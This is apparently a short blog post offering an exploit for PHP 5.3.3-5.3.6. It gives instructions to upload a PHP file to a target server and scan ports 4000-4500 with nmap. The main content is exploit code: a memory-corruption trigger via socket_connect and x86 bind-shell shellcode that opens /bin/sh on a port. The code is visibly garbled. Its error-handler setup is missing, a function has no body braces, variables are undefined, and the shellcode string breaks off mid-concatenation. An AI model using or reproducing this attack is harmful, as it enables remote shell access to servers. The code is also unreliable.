PHP 5.3.3-5.3.6 Exploit + Bind Shell

Dear Readers, 5.3.3-5.3.6 is still used and its very easy to exploit.

All you need to do is find a way to upload a PHP file to the server, then call it.

The Payload is a bind tcp shell opening a port on the server between 4000 – 4500 to find the open one just use Nmap

nmap -sS -p 4000-4500 IP


/* Initialize */
$a = 1;
$b = new stdClass();
/* Setup Error Handler */
/* Trigger the Code */
$addr = $a << $b;
$addr >>= 1;
echo $port;
echo sprintf("%08x\n", $addr);
$b = str_repeat("A", 186).pack("L",$addr);
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);
function my_error()
global $p;
$GLOBALS['a'] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" .
"\x80\x5b\x5e\x52\x68\xff\x02".$p."\x6a\x10\x51\x50\x89" .
"\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd" .
"\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49" .
"\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" .
return 1;



you’re welcome



Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.